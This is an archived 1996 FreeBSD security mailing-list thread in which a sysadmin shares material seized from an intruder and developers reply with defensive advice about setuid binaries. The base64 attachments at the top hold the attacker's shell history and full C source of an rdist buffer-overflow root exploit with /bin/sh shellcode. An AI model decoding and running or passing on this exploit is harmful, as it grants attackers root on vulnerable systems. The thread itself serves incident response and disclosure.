UEc6OiBUb28gbWFueSBhcmd1bWVudHMua2pzYWRcXWENCiMrMDgzNzM3NTU3 Ng0KdHJoZXJlIGEgcmUgdG8gbWFudQ0KIyswODM3Mzc1NTc3DQpscyAtbA0K IyswODM3Mzc1NTc4DQpjZCAvDQojKzA4MzczNzU1NzkNCmwNCiMrMDgzNzM3 NTU4OQ0KY2hyb290DQojKzA4MzczNzU2MDQNCnBzIC1hdXgNCiMrMDgzNzM3 NTY0MA0KaXR2DQojKzA4MzczNzU2NDMNCmlyYw0KIyswODM3Mzc1NzU1DQpw YXNzd2QNCiMrMDgzNzM3NTc2MQ0KcGFzc3dkDQojKzA4MzczNzU3OTcNCmNk DQojKzA4MzczNzU4MDANCmxzDQojKzA4MzczNzU4MDcNCmxzDQojKzA4Mzcz NzU4MjQNCmNkIC9ob21lL2JncmVnDQojKzA4MzczNzU4MzUNCmxzDQojKzA4 MzczNzU5MDENCncNCiMrMDgzNzM3NTkxMw0KbHMNCiMrMDgzNzM3NTkzMw0K cm0gLXJmIGh0c3RhdHVzLjAwMDIxMyBvZCBscyBpIDAxOC5KUEc6IDAxOC5K UEcgdW1rZGVwMTUwNQ0KIyswODM3Mzc1OTM1DQpscw0KIyswODM3Mzc1OTQ3 DQpybSAtcmYgZXJfbW9kIGRlYWQubGV0dGVyIGNkDQojKzA4MzczNzU5NDkN CmxzDQojKzA4MzczNzU5NzANCncNCiMrMDgzNzM3NjAwMA0Kd3JvdGUgZXJi DQojKzA4MzczNzYwMDMNCndyaXRlIGVyYg0KIyswODM3Mzc2MDIwDQp3DQoj KzA4MzczNzYwNzENCmZpbmdlciBlcmINCiMrMDgzNzM3NjEwOQ0Kdw0KIysw ODM3Mzc2MTI4DQpscw0KIyswODM3Mzc2MjA2DQp3DQojKzA4MzczNzYyMTYN CmlyYw0KIyswODM3Mzc2NDIxDQp3DQojKzA4MzczNzY0MzINCmNkIC9iaW4v c2gNCiMrMDgzNzM3NjQzNA0KY2QgL2Jpbi9zaA0KIyswODM3Mzc2NDM4DQpj ZCBiaW4/DQojKzA4MzczNzY0NTQNCmxzDQojKzA4MzczNzY1NTANCmlyYyBN YzkgaXJjLnN1cGVybGluay5uZXQNCiMrMDgzNzM3NjkyNA0KcnVtaXNhZA0K IyswODM3Mzc2OTI4DQpydW1pc2JhZA0KIyswODM3Mzc2OTMxDQp3DQojKzA4 MzczNzY5NDcNCmxzDQojKzA4MzczNzY5NTQNCmxzIC1sDQojKzA4MzczNzY5 ODANCnoNCiMrMDgzNzM3Njk5MA0Kei5vDQojKzA4MzczNzY5OTQNCnoubw0K IyswODM3Mzc2OTk5DQphLm91dA0KIyswODM3Mzc4MTIwDQp3DQojKzA4Mzcz NzgxMjkNCnRhbGsgYmdyZWcNCiMrMDgzNzM3ODE2Nw0KdGFsayBiZ3JlZ0Bt ZXJjdXJ5LmdhaWFuZXQubmV0DQojKzA4MzczNzg0MDMNCncNCiMrMDgzNzM3 ODQyMQ0KcHMgeA0KIyswODM3Mzc4NDM0DQpraWxsIC05IDE1Njg1DQojKzA4 MzczNzg0NDINCmtpbGwgLTkgMTU0MzcNCiMrMDgzNzM3ODQ0NQ0KbHMNCiMr MDgzNzM3ODU2Mg0KbHMNCiMrMDgzNzM3ODU2OQ0KZGRkDQojKzA4MzczNzg1 OTINCmEub3V0DQojKzA4MzczNzk0NDgNCmxzDQojKzA4MzczNzk0NTgNCmdj YyAtbyBkIGQuYw0KIyswODM3Mzc5NDYxDQpkDQojKzA4MzczNzk1MDYNCndo b2FtaQ0KIyswODM3Mzc5NTEwDQpyb290DQojKzA4MzczNzk1MTUNCmQNCiMr MDgzNzM3OTYwNg0KbG9naW4NCiMrMDgzNzM4MDYzMQ0KYw0K --0-463065691-837413563=:1806 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="d.c" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5j bHVkZSA8dW5pc3RkLmg+DQoNCiNkZWZpbmUgREVGQVVMVF9PRkZTRVQgICAg ICAgICAgNTANCiNkZWZpbmUgQlVGRkVSX1NJWkUgICAgICAgICAgICAgMjU2 DQoNCmxvbmcgZ2V0X2VzcCh2b2lkKSAgIA0Kew0KICAgX19hc21fXygibW92 bCAlZXNwLCVlYXhcbiIpOw0KfQ0KDQptYWluKGludCBhcmdjLCBjaGFyICoq YXJndikNCnsNCiAgIGNoYXIgKmJ1ZmYgPSBOVUxMOw0KICAgdW5zaWduZWQg bG9uZyAqYWRkcl9wdHIgPSBOVUxMOyANCiAgIGNoYXIgKnB0ciA9IE5VTEw7 DQoNCi8qIHNvIHlvdSBkb250IGhhdmUgdG8gZGlzYXNzZW1ibGUgaXQsIGhl cmUgaXMgdGhlIGFzbSBjb2RlOg0Kc3RhcnQ6DQpqbXAgICAgIGVuZG9mazBk ZXoNCnJlYWxzdGFydDoNCnBvcGwgICAgJWVzaQ0KbGVhbCAgICAoJWVzaSks ICVlYngNCm1vdmwgICAgJWVieCwgMHgwYiglZXNpKQ0KeG9ybCAgICAlZWR4 LCAlZWR4DQptb3ZsICAgICVlZHgsIDcoJWVzaSkNCm1vdmwgICAgJWVkeCwg MHgwZiglZXNpKQ0KbW92bCAgICAlZWR4LCAweDE0KCVlc2kpDQptb3ZiICAg ICVlZHgsIDB4MTkoJWVzaSkgICANCnhvcmwgICAgJWVheCwgJWVheA0KbW92 YiAgICAkNTksICVhbA0KbGVhbCAgICAweDBiKCVlc2kpLCAlZWN4DQptb3Zs ICAgICVlY3gsICVlZHggICANCnB1c2hsICAgJWVkeA0KcHVzaGwgICAlZWN4 DQpwdXNobCAgICVlYngNCnB1c2hsICAgJWVheA0Kam1wICAgICBiZXdtDQpl bmRvZmswZGV6OiANCmNhbGwgICAgcmVhbHN0YXJ0ICAgDQouYnl0ZSAgICcv JywgJ2InLCAnaScsICduJywgJy8nLCAncycsICdoJw0KLmJ5dGUgICAxLCAx LCAxLCAxDQouYnl0ZSAgIDIsIDIsIDIsIDIgICANCi5ieXRlICAgMywgMywg MywgMw0KYmV3bToNCi5ieXRlICAgMHg5YSwgNCwgNCwgNCwgNCwgNywgNA0K Ki8NCg0KICAgY2hhciBleGVjc2hlbGxbXSA9ICAgDQogICAiXHhlYlx4MjMi DQogICAiXHg1ZSIgICANCiAgICJceDhkXHgxZSINCiAgICJceDg5XHg1ZVx4 MGIiDQogICAiXHgzMVx4ZDIiDQogICAiXHg4OVx4NTZceDA3Ig0KICAgIlx4 ODlceDU2XHgwZiINCiAgICJceDg5XHg1Nlx4MTQiICAgDQogICAiXHg4OFx4 NTZceDE5Ig0KICAgIlx4MzFceGMwIg0KICAgIlx4YjBceDNiIg0KICAgIlx4 OGRceDRlXHgwYiIgDQogICAgIlx4ODlceGNhIg0KICAgIlx4NTIiDQogICAi XHg1MSINCiAgICJceDUzIg0KICAgIlx4NTAiDQogICAiXHhlYlx4MTgiDQog ICAiXHhlOFx4ZDhceGZmXHhmZlx4ZmYiDQogICAiL2Jpbi9zaCIgDQogICAi XHgwMVx4MDFceDAxXHgwMSINCiAgICJceDAyXHgwMlx4MDJceDAyIg0KICAg Ilx4MDNceDAzXHgwM1x4MDMiDQogICAiXHg5YVx4MDRceDA0XHgwNFx4MDRc eDA3XHgwNCI7DQogICANCiAgIGludCBpOw0KICAgaW50IG9mcyA9IERFRkFV TFRfT0ZGU0VUOw0KICAgDQogICAvKiBpZiB3ZSBoYXZlIGEgYXJndW1lbnQs IHVzZSBpdCBhcyBvZmZzZXQsIGVsc2UgdXNlIGRlZmF1bHQgKi8NCiAgIGlm KGFyZ2MgPT0gMikNCiAgICAgIG9mcyA9IGF0b2koYXJndlsxXSk7DQogICAv KiBwcmludCB0aGUgb2Zmc2V0IGluIHVzZSAqLw0KICAgcHJpbnRmKCJVc2lu ZyBvZmZzZXQgb2YgZXNwICsgJWQgKCV4KVxuIiwgb2ZzLCBnZXRfZXNwKCkr b2ZzKTsNCiAgIA0KICAgYnVmZiA9IG1hbGxvYyg0MDk2KTsNCiAgIGlmKCFi dWZmKQ0KICAgew0KICAgICAgcHJpbnRmKCJjYW4ndCBhbGxvY2F0ZSBtZW1v cnlcbiIpOw0KICAgICAgZXhpdCgwKTsNCiAgIH0NCiAgIHB0ciA9IGJ1ZmY7 DQogICAvKiBmaWxsIHN0YXJ0IG9mIGJ1ZmZlciB3aXRoIG5vcHMgKi8NCiAg IG1lbXNldChwdHIsIDB4OTAsIEJVRkZFUl9TSVpFLXN0cmxlbihleGVjc2hl bGwpKTsNCiAgIHB0ciArPSBCVUZGRVJfU0laRS1zdHJsZW4oZXhlY3NoZWxs KTsNCiAgIC8qIHN0aWNrIGFzbSBjb2RlIGludG8gdGhlIGJ1ZmZlciAqLw0K ICAgZm9yKGk9MDtpIDwgc3RybGVuKGV4ZWNzaGVsbCk7aSsrKQ0KICAgICAg KihwdHIrKykgPSBleGVjc2hlbGxbaV07DQogICAvKiB3cml0ZSB0aGUgcmV0 dXJuIGFkZHJlc3Nlcw0KICAgKioNCiAgICoqIHJldHVybiBhZGRyZXNzICAg ICAgICAgICAgICAgICAgICAgICAgICAgIDQNCiAgICoqIGVicCAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDQNCiAgICoqIHJlZ2lz dGVyIHVuc2lnbmVkIG4gICAgICAgICAgICAgICAgICAgICAgIDANCiAgICoq IHJlZ2lzdGVyIGNoYXIgKmNwICAgICAgICAgICAgICAgICAgICAgICAgIDAN CiAgICoqIHJlZ2lzdGVyIHN0cnVjdCBzeW1lbnQgKnMgICAgICAgICAgICAg ICAgIDANCiAgICoqDQogICAqKiB0b3RhbDogOA0KICAgKi8NCiAgIGFkZHJf cHRyID0gKGxvbmcgKilwdHI7DQogICBmb3IoaT0wO2kgPCAoOC80KTtpKysp DQogICAgICAqKGFkZHJfcHRyKyspID0gZ2V0X2VzcCgpICsgb2ZzOw0KICAg cHRyID0gKGNoYXIgKilhZGRyX3B0cjsNCiAgICpwdHIgPSAwOw0KICAgZXhl Y2woIi91c3IvYmluL3JkaXN0IiwgInJkaXN0IiwgIi1kIiwgYnVmZiwgIi1k IiwgYnVmZiwgTlVMTCk7DQp9DQoNCg== --0-463065691-837413563=:1806-- From owner-freebsd-security Mon Jul 15 00:04:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA07854 for security-outgoing; Mon, 15 Jul 1996 00:04:52 -0700 (PDT) Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id AAA07846 for ; Mon, 15 Jul 1996 00:04:50 -0700 (PDT) Received: from neptune.tadiran.co.il (neptune.telecomm.tadiran.co.il [194.90.74.66]) by who.cdrom.com (8.6.12/8.6.11) with ESMTP id AAA18384 for ; Mon, 15 Jul 1996 00:04:47 -0700 Received: (from yoav@localhost) by neptune.tadiran.co.il (8.7.5/8.7.3) id KAA26611 for security@FreeBSD.ORG; Mon, 15 Jul 1996 10:01:19 +0300 (IDT) Date: Mon, 15 Jul 1996 10:01:19 +0300 (IDT) From: Yoav Newman (1822) Message-Id: <199607150701.KAA26611@neptune.tadiran.co.il> To: security@FreeBSD.ORG Subject: Going on Vacation :) Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk unsubscribe From owner-freebsd-security Mon Jul 15 00:16:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA08991 for security-outgoing; Mon, 15 Jul 1996 00:16:11 -0700 (PDT) Received: from neptune.tadiran.co.il (neptune.telecomm.tadiran.co.il [194.90.74.66]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA08891; Mon, 15 Jul 1996 00:15:42 -0700 (PDT) Received: (from yoav@localhost) by neptune.tadiran.co.il (8.7.5/8.7.3) id KAA26982; Mon, 15 Jul 1996 10:13:22 +0300 (IDT) Date: Mon, 15 Jul 1996 10:13:22 +0300 (IDT) From: Yoav Newman X-Sender: yoav@neptune To: announce@freebsd.org cc: hackers@freebsd.org, questions@freebsd.org, bugs@freebsd.org, current@freebsd.org, security@freebsd.org, ports@freebsd.org Subject: unsubscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/_/ _/ _/_/ _/ _/ _/ _/ _/ _/_/_/ _/ _/ _/ _/_/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/_/ _/_/ _/ _/ _/ _/ _/_/_/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/_/ -/_/ _/ _/ _/_/_/_/ _/ _/_/ _/ _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/_/ _/ _/_/_/_/ _/_/_/ _/_/_/_/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/ _/ _/ _/ _/ _/_/_/_/ _/ _/_/ _/ _/ _/ _/_/_/_/ _/_/_/ _/ _/ _/ _/ _/ _/ From owner-freebsd-security Mon Jul 15 00:35:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA10853 for security-outgoing; Mon, 15 Jul 1996 00:35:40 -0700 (PDT) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA10843; Mon, 15 Jul 1996 00:35:35 -0700 (PDT) Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.7.5/8.7.3) with ESMTP id JAA04867; Mon, 15 Jul 1996 09:35:02 +0200 (MET DST) To: jbhunt cc: freebsd-security-notification@freebsd.org, freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-reply-to: Your message of "Sun, 14 Jul 1996 23:52:43 PDT." Date: Mon, 15 Jul 1996 09:35:01 +0200 Message-ID: <4865.837416101@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >Ok, for almost 3 weeks now we at Gaianet have been tracking root hackers >around our box. FINALLY, today at about 3 pm one of them made a BIG BIG >mistake. Fortunately, for us I was around to watch what happened and kill >the user before he was able to erase his history files and the exploit >itself. So here are the files necessary to fix whatever hole this >exploits. We run Freebsd Current so it obviously makes most freebsd >systems vulnerable to a root attack. I appreciate any help you can offer. OK, this is the rdist hole, it's already being worked in I think. remove the rdist program from your system, or just remove the setuid bit from it. Do normal "we've been hacked cleanup". -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Mon Jul 15 00:43:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA11727 for security-outgoing; Mon, 15 Jul 1996 00:43:10 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA11721; Mon, 15 Jul 1996 00:43:08 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA22765; Mon, 15 Jul 1996 00:43:05 -0700 (PDT) Date: Mon, 15 Jul 1996 00:43:05 -0700 (PDT) From: -Vince- To: Poul-Henning Kamp cc: jbhunt , freebsd-security-notification@freebsd.org, freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-Reply-To: <4865.837416101@critter.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Poul-Henning Kamp wrote: > >Ok, for almost 3 weeks now we at Gaianet have been tracking root hackers > >around our box. FINALLY, today at about 3 pm one of them made a BIG BIG > >mistake. Fortunately, for us I was around to watch what happened and kill > >the user before he was able to erase his history files and the exploit > >itself. So here are the files necessary to fix whatever hole this > >exploits. We run Freebsd Current so it obviously makes most freebsd > >systems vulnerable to a root attack. I appreciate any help you can offer. > > OK, this is the rdist hole, it's already being worked in I think. > > remove the rdist program from your system, or just remove the setuid > bit from it. > > Do normal "we've been hacked cleanup". While we're at the subject, is there a hole with mount_msdos also because the guy had some text on mount_msdos but I deleted the /sbin/mount_msdos and -current still installs with the setuid bit... Vince From owner-freebsd-security Mon Jul 15 00:47:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA12122 for security-outgoing; Mon, 15 Jul 1996 00:47:37 -0700 (PDT) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA12108; Mon, 15 Jul 1996 00:47:30 -0700 (PDT) Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.7.5/8.7.3) with ESMTP id JAA04916; Mon, 15 Jul 1996 09:46:57 +0200 (MET DST) To: -Vince- cc: jbhunt , freebsd-security-notification@freebsd.org, freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-reply-to: Your message of "Mon, 15 Jul 1996 00:43:05 PDT." Date: Mon, 15 Jul 1996 09:46:56 +0200 Message-ID: <4914.837416816@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >> remove the rdist program from your system, or just remove the setuid >> bit from it. >> >> Do normal "we've been hacked cleanup". > > While we're at the subject, is there a hole with mount_msdos also >because the guy had some text on mount_msdos but I deleted the >/sbin/mount_msdos and -current still installs with the setuid bit... Well, until proven innocent, all setuid programs are suspect. Make a list of them all, remove setuid on any you don't use. Consider carefully the minimum permissions you can get away with on the rest. -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Mon Jul 15 00:49:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA12365 for security-outgoing; Mon, 15 Jul 1996 00:49:14 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA12360; Mon, 15 Jul 1996 00:49:12 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA23308; Mon, 15 Jul 1996 00:49:10 -0700 (PDT) Date: Mon, 15 Jul 1996 00:49:10 -0700 (PDT) From: -Vince- To: Poul-Henning Kamp cc: jbhunt , freebsd-security-notification@freebsd.org, freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-Reply-To: <4914.837416816@critter.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Poul-Henning Kamp wrote: > >> remove the rdist program from your system, or just remove the setuid > >> bit from it. > >> > >> Do normal "we've been hacked cleanup". > > > > While we're at the subject, is there a hole with mount_msdos also > >because the guy had some text on mount_msdos but I deleted the > >/sbin/mount_msdos and -current still installs with the setuid bit... > > Well, until proven innocent, all setuid programs are suspect. > > Make a list of them all, remove setuid on any you don't use. Consider > carefully the minimum permissions you can get away with on the rest. Okay, now besides the /sbin directory, what other binaries are setuid that are installed by -current? Vince From owner-freebsd-security Mon Jul 15 01:06:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA13894 for security-outgoing; Mon, 15 Jul 1996 01:06:17 -0700 (PDT) Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA13884 for ; Mon, 15 Jul 1996 01:06:09 -0700 (PDT) Received: from localhost (gpalmer@localhost [127.0.0.1]) by orion.webspan.net (8.7.5/8.6.12) with SMTP id EAA01236; Mon, 15 Jul 1996 04:06:00 -0400 (EDT) X-Authentication-Warning: orion.webspan.net: Host gpalmer@localhost [127.0.0.1] didn't use HELO protocol To: jbhunt cc: freebsd-security@freebsd.org, root@mercury.gaianet.net From: "Gary Palmer" Subject: Re: New EXPLOIT located! In-reply-to: Your message of "Sun, 14 Jul 1996 23:52:43 PDT." Date: Mon, 15 Jul 1996 04:06:00 -0400 Message-ID: <1232.837417960@orion.webspan.net> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk jbhunt wrote in message ID : > Ok, for almost 3 weeks now we at Gaianet have been tracking root hackers > around our box. FINALLY, today at about 3 pm one of them made a BIG BIG > mistake. Fortunately, for us I was around to watch what happened and kill > the user before he was able to erase his history files and the exploit > itself. So here are the files necessary to fix whatever hole this > exploits. We run Freebsd Current so it obviously makes most freebsd > systems vulnerable to a root attack. I appreciate any help you can offer. from the source supplied: --SNIP-- execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, NULL); --SNIP-- You *HAVE* applied the rdist patch(es), or better yet, DISABLED rdist totally, haven't you? Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 15 01:10:00 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA14116 for security-outgoing; Mon, 15 Jul 1996 01:10:00 -0700 (PDT) Received: from dhp.com (dhp.com [199.245.105.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA14109 for ; Mon, 15 Jul 1996 01:09:57 -0700 (PDT) Received: (from jaeger@localhost) by dhp.com (8.7.5/8.6.12) id EAA02564; Mon, 15 Jul 1996 04:09:49 -0400 Date: Mon, 15 Jul 1996 04:09:48 -0400 (EDT) From: jaeger To: jbhunt cc: freebsd-security@freebsd.org Subject: Re: New EXPLOIT located! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 14 Jul 1996, jbhunt wrote: > Ok, for almost 3 weeks now we at Gaianet have been tracking root hackers > around our box. FINALLY, today at about 3 pm one of them made a BIG BIG > mistake. Fortunately, for us I was around to watch what happened and kill > the user before he was able to erase his history files and the exploit > itself. So here are the files necessary to fix whatever hole this > exploits. We run Freebsd Current so it obviously makes most freebsd > systems vulnerable to a root attack. I appreciate any help you can offer. > > John > SysAdmin Gaianet This is the rdist overflow exploit posted to bugtraq a few days ago by Brian Mitchell. No magic there ;>. Once again, your posting of the crackers history logs was very informative. It appears they were busy trading passwords on the IRC. At least he's adept enough at using find... -jaeger From owner-freebsd-security Mon Jul 15 01:21:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA14774 for security-outgoing; Mon, 15 Jul 1996 01:21:14 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA14769; Mon, 15 Jul 1996 01:21:10 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA26136; Mon, 15 Jul 1996 01:21:07 -0700 (PDT) Date: Mon, 15 Jul 1996 01:21:07 -0700 (PDT) From: -Vince- To: Gary Palmer cc: jbhunt , freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-Reply-To: <1232.837417960@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Gary Palmer wrote: > jbhunt wrote in message ID > : > > Ok, for almost 3 weeks now we at Gaianet have been tracking root hackers > > around our box. FINALLY, today at about 3 pm one of them made a BIG BIG > > mistake. Fortunately, for us I was around to watch what happened and kill > > the user before he was able to erase his history files and the exploit > > itself. So here are the files necessary to fix whatever hole this > > exploits. We run Freebsd Current so it obviously makes most freebsd > > systems vulnerable to a root attack. I appreciate any help you can offer. > > from the source supplied: > > --SNIP-- > execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, NULL); > --SNIP-- > > You *HAVE* applied the rdist patch(es), or better yet, DISABLED rdist > totally, haven't you? Only took out the setuid flag... Have the patches been applied to the latest -current since I just recompiled rdist from the latest -current sources... Vince From owner-freebsd-security Mon Jul 15 01:28:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA15246 for security-outgoing; Mon, 15 Jul 1996 01:28:43 -0700 (PDT) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA15228; Mon, 15 Jul 1996 01:28:35 -0700 (PDT) Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.7.5/8.7.3) with ESMTP id KAA05003; Mon, 15 Jul 1996 10:28:03 +0200 (MET DST) To: -Vince- cc: jbhunt , freebsd-security-notification@freebsd.org, freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-reply-to: Your message of "Mon, 15 Jul 1996 00:49:10 PDT." Date: Mon, 15 Jul 1996 10:28:02 +0200 Message-ID: <5001.837419282@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message , -Vinc e- writes: >On Mon, 15 Jul 1996, Poul-Henning Kamp wrote: > >> >> remove the rdist program from your system, or just remove the setuid >> >> bit from it. >> >> >> >> Do normal "we've been hacked cleanup". >> > >> > While we're at the subject, is there a hole with mount_msdos also >> >because the guy had some text on mount_msdos but I deleted the >> >/sbin/mount_msdos and -current still installs with the setuid bit... >> >> Well, until proven innocent, all setuid programs are suspect. >> >> Make a list of them all, remove setuid on any you don't use. Consider >> carefully the minimum permissions you can get away with on the rest. > > Okay, now besides the /sbin directory, what other binaries are >setuid that are installed by -current? it sounds like you need to scan your ENTIRE system for them by now :-( -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Mon Jul 15 01:31:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA15446 for security-outgoing; Mon, 15 Jul 1996 01:31:41 -0700 (PDT) Received: from dhp.com (dhp.com [199.245.105.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA15438; Mon, 15 Jul 1996 01:31:36 -0700 (PDT) Received: (from jaeger@localhost) by dhp.com (8.7.5/8.6.12) id EAA07044; Mon, 15 Jul 1996 04:31:33 -0400 Date: Mon, 15 Jul 1996 04:31:31 -0400 (EDT) From: jaeger To: -Vince- cc: Poul-Henning Kamp , jbhunt , freebsd-security@freebsd.org Subject: Re: New EXPLOIT located! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, -Vince- wrote: > > While we're at the subject, is there a hole with mount_msdos also > because the guy had some text on mount_msdos but I deleted the > /sbin/mount_msdos and -current still installs with the setuid bit... > > Vince > mount_msdos is subject to the same vfsload(3) problems as mount_union. The exploit is slightly different. The FreeBSD advisory gave details on how to disable the suid bit in -current makefiles. -jaeger From owner-freebsd-security Mon Jul 15 01:51:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA17174 for security-outgoing; Mon, 15 Jul 1996 01:51:17 -0700 (PDT) Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA17150; Mon, 15 Jul 1996 01:51:06 -0700 (PDT) Received: from localhost (gpalmer@localhost [127.0.0.1]) by orion.webspan.net (8.7.5/8.6.12) with SMTP id EAA02176; Mon, 15 Jul 1996 04:50:59 -0400 (EDT) X-Authentication-Warning: orion.webspan.net: Host gpalmer@localhost [127.0.0.1] didn't use HELO protocol To: -Vince- cc: Poul-Henning Kamp , jbhunt , freebsd-security@freebsd.org, root@mercury.gaianet.net From: "Gary Palmer" Subject: Re: New EXPLOIT located! In-reply-to: Your message of "Mon, 15 Jul 1996 00:49:10 PDT." Date: Mon, 15 Jul 1996 04:50:59 -0400 Message-ID: <2172.837420659@orion.webspan.net> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote in message ID : > Okay, now besides the /sbin directory, what other binaries are > setuid that are installed by -current? something like: find / -fstype ufs \( -perm -u+s -or -perm -g+s \) -print will get you a list of all locally installed SUID / SGID binaries. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 15 03:18:17 1996 Return-Path: 